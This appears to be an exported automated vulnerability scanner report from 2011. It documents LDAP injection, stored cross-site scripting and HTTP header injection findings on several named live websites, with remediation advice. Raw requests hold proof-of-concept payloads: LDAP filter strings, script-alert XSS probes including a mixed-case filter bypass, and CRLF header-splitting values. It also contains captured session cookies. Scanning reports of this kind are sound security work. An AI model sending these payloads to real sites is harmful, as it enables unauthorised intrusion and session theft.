Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:14:02 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 65
Content-Type: text/xml

<?xml version="1.0" encoding="ISO-8859-1"?>
<markers>
</markers>
2. LDAP injection  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hbccards.com
Path:   /ordernow.asp

Issue detail

The X-Mapping-ofcbhgem cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the X-Mapping-ofcbhgem cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.

Request 1

GET /ordernow.asp HTTP/1.1
Host: www.hbccards.com
Proxy-Connection: keep-alive
Referer: http://www.hbccards.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQASQRRDR=KMHDLKEBEFFFDGLAGGIHOIMA; X-Mapping-ofcbhgem=*)(sn=*; __utmz=143952236.1301493176.1.1.utmcsr=www2.hbc.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/index.shtml; __utma=143952236.1494936254.1301493176.1301493176.1301493176.1; __utmc=143952236; __utmb=143952236.1.10.1301493176

Response 1

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 13:54:29 GMT
Server: Microsoft-IIS/7.0
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/html; charset=UTF-8
X-Powered-By: ASP.NET
Content-Length: 26877
Set-Cookie: ASPSESSIONIDASCQDSAS=EPKLECJBDJONHADGAAFPJNJJ; path=/
Set-Cookie: X-Mapping-ofcbhgem=87F600579E92D94B86F73C50B28A9011; path=/



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="verify-v1" content="GRCE6xM3xZdXlLcKcRFjxCaVnk0e2bEm68tZ64H5LQE=" >
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<title>Order Hbc Corporate Gift Cards </title>

<!-- IE6 Fix Attempt -->

<!--[if IE 6]>
<style>
.menu {display:block; width:990px !important; }
#left_side{margin-top:0px !important; }
#inside_right{margin-top:0px !important; width:590px !important; float:right !important; clear:none !important; z-index:1 !important;}
#maincontainer{z-index:0 !important; }


input {width:250px !important;}
.createprofile_line {width:590px !important; float:left !important; clear:both !important; }
.createprofile_formside {width:260px !important; float:left !important; clear:none !important; }
.checkbox{width:15px !important; }
form #aform select{width: 250px !important; }

</style>
<![endif]-->

<!--[if IE]>
<style>
#navigation_minor_1 {padding-top:3px !important; padding-bottom:3px !important;}
#navigation_minor_2{padding-top:3px !important; padding-bottom:3px !important;}
</style>
<![endif]-->

<!--[if gt IE 7]>
<style>
#navigation_minor_1 {padding-top:6px !important; }
#navigation_minor_2{padding-top:6px !important; }
</style>
<![endif]-->


<link rel="stylesheet" href="css/hbc.css" type="text/css" />
<link rel="stylesheet" href="css/sifr.css" type="text/css" />

<script src="js/sifr.js" type="text/javascript"></script>
<script src="js/sifr-config.js" type="text/javascript"></script>

<!-- form validators -->

<link href="css/lytebox.css" rel="stylesheet" type="text/css" />
<SCRIPT TYPE="text/javascript" src=formval.js></SCRIPT>
<sc
...[SNIP]...

Request 2

GET /ordernow.asp HTTP/1.1
Host: www.hbccards.com
Proxy-Connection: keep-alive
Referer: http://www.hbccards.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQASQRRDR=KMHDLKEBEFFFDGLAGGIHOIMA; X-Mapping-ofcbhgem=*)!(sn=*; __utmz=143952236.1301493176.1.1.utmcsr=www2.hbc.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/index.shtml; __utma=143952236.1494936254.1301493176.1301493176.1301493176.1; __utmc=143952236; __utmb=143952236.1.10.1301493176

Response 2

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 13:54:32 GMT
Server: Microsoft-IIS/7.0
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/html; charset=UTF-8
X-Powered-By: ASP.NET
Content-Length: 26877
Set-Cookie: X-Mapping-ofcbhgem=8D3F5C4CE3306DE23752A8D1F5AEFD98; path=/



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="verify-v1" content="GRCE6xM3xZdXlLcKcRFjxCaVnk0e2bEm68tZ64H5LQE=" >
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<title>Order Hbc Corporate Gift Cards </title>

<!-- IE6 Fix Attempt -->

<!--[if IE 6]>
<style>
.menu {display:block; width:990px !important; }
#left_side{margin-top:0px !important; }
#inside_right{margin-top:0px !important; width:590px !important; float:right !important; clear:none !important; z-index:1 !important;}
#maincontainer{z-index:0 !important; }


input {width:250px !important;}
.createprofile_line {width:590px !important; float:left !important; clear:both !important; }
.createprofile_formside {width:260px !important; float:left !important; clear:none !important; }
.checkbox{width:15px !important; }
form #aform select{width: 250px !important; }

</style>
<![endif]-->

<!--[if IE]>
<style>
#navigation_minor_1 {padding-top:3px !important; padding-bottom:3px !important;}
#navigation_minor_2{padding-top:3px !important; padding-bottom:3px !important;}
</style>
<![endif]-->

<!--[if gt IE 7]>
<style>
#navigation_minor_1 {padding-top:6px !important; }
#navigation_minor_2{padding-top:6px !important; }
</style>
<![endif]-->


<link rel="stylesheet" href="css/hbc.css" type="text/css" />
<link rel="stylesheet" href="css/sifr.css" type="text/css" />

<script src="js/sifr.js" type="text/javascript"></script>
<script src="js/sifr-config.js" type="text/javascript"></script>

<!-- form validators -->

<link href="css/lytebox.css" rel="stylesheet" type="text/css" />
<SCRIPT TYPE="text/javascript" src=formval.js></SCRIPT>
<script type="text/javascript" language="javascript" src="js/lytebox.j
...[SNIP]...
3. Cross-site scripting (stored)  previous  next
There are 2 instances of this issue:

Issue background

Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach targe users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.

Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

3.1. http://learn.shavlik.com/shavlik/index.cfm [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.shavlik.com
Path:   /shavlik/index.cfm

Issue detail

The value of the h request parameter submitted to the URL /shavlik/index.cfm is copied into an HTML comment at the URL /shavlik/index.cfm. The payload 78a5a--><script>alert(1)</script>c5257cb7950 was submitted in the h parameter. This input was returned unmodified in a subsequent request for the URL /shavlik/index.cfm.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request 1

GET /shavlik/index.cfm?m=1009&pg=697&h=78a5a--><script>alert(1)</script>c5257cb7950&hp=70 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=610666; CFTOKEN=95679479; __utmz=202100691.1300711269.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=202100691.944756920.1300711269.1300711269.1300711269.1

Request 2

GET /shavlik/index.cfm?m=1009&pg=697&h=&hp=69 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=610666; CFTOKEN=95679479; __utmz=202100691.1300711269.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=202100691.944756920.1300711269.1300711269.1300711269.1

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Mar 2011 21:02:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


                                                                       
...[SNIP]...
<!-- 78a5a--><script>alert(1)</script>c5257cb7950|697 -- -->
...[SNIP]...
3.2. http://order.1and1.com/xml/order/Home [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Home

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/Home is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Home. The payload ea665</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>c100d99cab9 was submitted in the REST URL parameter 3. This input was returned as ea665</ScRiPt ><ScRiPt>alert(1)</ScRiPt>c100d99cab9 in a subsequent request for the URL /xml/order/Home.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/Homeea665</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>c100d99cab9;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__reuse=1301085812313 HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4f6d1cc610415400; UT=zY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDowNmZvNSgpJSUjKiYoICAgHR0=; emos1und1d1_jcsid=AAABLu7Cx_zt8xXxYBlocQB77**YqU*t:1:AAABLu7Cx_wZVGEkt*DMxXkpVLopiumS:1301085865980; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:4:AAABLu7Cx_zt8xXxYBlocQB77**YqU*t:1301085865980:0:false:10
If-None-Match: b893ed23e93e100ddf8d3139f7f81ff4

Request 2

GET /xml/order/Home;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__reuse=1301085812313 HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4f6d1cc610415400; UT=zY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDowNmZvNSgpJSUjKiYoICAgHR0=; emos1und1d1_jcsid=AAABLu7Cx_zt8xXxYBlocQB77**YqU*t:1:AAABLu7Cx_wZVGEkt*DMxXkpVLopiumS:1301085865980; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:4:AAABLu7Cx_zt8xXxYBlocQB77**YqU*t:1301085865980:0:false:10

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 21:08:59 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=DYlcnQUI4YWFhW25kazFpYzAiLGVYUipBNC4tMS4uLSstKygoKyokJyseIB8eG0AuWmZodi4wK1s0Xm0zJicjIicjISQiHCQbMTpyczkvNWVuNCcoJCQiKSUnHx8fHBw=; Expires=Thu, 13-Apr-2079 00:23:06 GMT; Path=/
ETag: 5a3e49c368168e21af680e510fa8e1df
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 36436


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
3B2E0C115D59680FE3F90BB02.TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="Home";UNOUNO.params.lastpage="Homeea665</ScRiPt ><ScRiPt>alert(1)</ScRiPt>c100d99cab9";UNOUNO.params.articles="0"};
   //-->
...[SNIP]...
4. HTTP header injection  previous  next
There are 10 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

4.1. http://ad.doubleclick.net/ad/huffpost.boomerangpixel/bingmodule [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/huffpost.boomerangpixel/bingmodule

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6c394%0d%0a997748dc239 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6c394%0d%0a997748dc239/huffpost.boomerangpixel/bingmodule;new-york=1;politics=1;;entry_id=840995;@depressing=1;@mostpopular=1;@recommend=1;@ypolitics=1;@yus-news=1;ferraro=1;ferraro-dead=1;ferraro-dies=1;ferraro-passes=1;geraldine-ferraro=1;geraldine-ferraro-cancer=1;geraldine-ferraro-dead=1;geraldine-ferraro-died=1;geraldine-ferraro-dies=1;geraldine-ferraro-passes=1;gerry-ferraro-dead=1;gerry-ferraro-dies=1;gerry-ferraro-passes=1;global=1;load_mode=inline;page_type=bpage;pos=boomerang;hot=fb;hot=tw;u=1x1%7Cbpage%7Cboomerang%7C@depressing,@mostpopular,@recommend,@ypolitics,@yus-news,ferraro,ferraro-dead,ferraro-dies,ferraro-passes,geraldine-ferraro,geraldine-ferraro-cancer,geraldine-ferraro-dead,geraldine-ferraro-died,geraldine-ferraro-dies,geraldine-ferraro-passes,gerry-ferraro-dead,gerry-ferraro-dies,gerry-ferraro-passes%7Cfb,tw%7C%7C%7C840995%7C%7C%7C%7C;dcove=r;sz=1x1;tile=4;ord=5299499505? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6c394
997748dc239/huffpost.boomerangpixel/bingmodule;new-york=1;politics=1;;entry_id=840995;@depressing=1;@mostpopular=1;@recommend=1;@ypolitics=1;@yus-news=1;ferraro=1;ferraro-dead=1;ferraro-dies=1;ferraro-passes=1;geraldine-ferraro=1;geraldine-ferraro-cancer=1;geraldine-ferraro-dead=1;geraldine-:
Date: Sat, 26 Mar 2011 20:36:28 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
4.2. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.45

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 12a6e%0d%0a3cb4ffd24b0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /12a6e%0d%0a3cb4ffd24b0/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B_3W2gOaNTb_MJcfPlQfPk9SfDJWpie8BhaKK8hLjqLazM4DergIQARgBIL7O5Q04AFDEwrTWBmDJBqABo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ&num=1&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QA&client=ca-pub-4063878933780912&adurl=;ord=403758047? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301163258&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Facunetix%2F1and1-acu.html&dt=1301145263878&bpp=3&shv=r20110315&jsv=r20110321-2&correlator=1301145263926&frm=0&adk=1819763764&ga_vid=1614914829.1301145264&ga_sid=1301145264&ga_hid=614052216&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1167&bih=1049&fu=0&ifi=1&dtd=170&xpc=aCf5lBJVxh&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/12a6e
3cb4ffd24b0/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http: //googleads.g.doubleclick.net/aclk
Date: Sat, 26 Mar 2011 13:14:51 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
4.3. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5956.Google/B3941858.12

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 15f52%0d%0a4fdade80305 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /15f52%0d%0a4fdade80305/N5956.Google/B3941858.12;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BuhlESOmMTaTqLsW6lQeZ4K2JCMy95NwB5MGbzhnAjbcBwMmjARABGAEgvs7lDTgAUOO0w5sGYMkGoAHw7Iz1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ&num=1&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A&client=ca-pub-4063878933780912&adurl=;ord=1246807419? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301098441&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fwww.soundingsonline.com_80.htm&dt=1301080440634&bpp=4&shv=r20110315&jsv=r20110321-2&correlator=1301080441371&frm=0&adk=1607234649&ga_vid=967180559.1301080441&ga_sid=1301080441&ga_hid=295407676&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=979&eid=44901217&fu=0&ifi=1&dtd=764&xpc=MMXNXDQ6lh&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/15f52
4fdade80305/N5956.Google/B3941858.12;sz=728x90;click=http: //googleads.g.doubleclick.net/aclk
Date: Fri, 25 Mar 2011 19:19:41 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
4.4. http://ad.doubleclick.net/adi/huffpost.politics/news [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/huffpost.politics/news

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 26fba%0d%0a2a7290e692e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /26fba%0d%0a2a7290e692e/huffpost.politics/news;new-york=1;politics=1;;entry_id=840995;@depressing=1;@mostpopular=1;@recommend=1;@ypolitics=1;@yus-news=1;ferraro=1;ferraro-dead=1;ferraro-dies=1;ferraro-passes=1;geraldine-ferraro=1;geraldine-ferraro-cancer=1;geraldine-ferraro-dead=1;geraldine-ferraro-died=1;geraldine-ferraro-dies=1;geraldine-ferraro-passes=1;gerry-ferraro-dead=1;gerry-ferraro-dies=1;gerry-ferraro-passes=1;global=1;cap_12=n;qcs=D;qcs=T;qcs=2687;qcs=2685;qcs=2402;qcs=1910;qcs=1908;qcs=1905;qcs=1592;qcs=683;qcs=682;qcs=680;qcs=679;qcs=678;qcs=677;qcs=676;qcs=666;qcs=665;qcs=660;qcs=657;;plat=win;br=ch;bv=10;subbv=0;load_mode=inline;page_type=bpage;pos=leaderboard_top;hot=fb;hot=tw;u=728x90%7Cbpage%7Cleaderboard_top%7C@depressing,@mostpopular,@recommend,@ypolitics,@yus-news,ferraro,ferraro-dead,ferraro-dies,ferraro-passes,geraldine-ferraro,geraldine-ferraro-cancer,geraldine-ferraro-dead,geraldine-ferraro-died,geraldine-ferraro-dies,geraldine-ferraro-passes,gerry-ferraro-dead,gerry-ferraro-dies,gerry-ferraro-passes%7Cfb,tw%7C%7CD,T,2687,2685,2402,1910,1908,1905,1592,683,682,680,679,678,677,676,666,665,660,657%7C840995%7C%7C%7C;sz=728x90;tile=1;ord=20736431? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/26fba
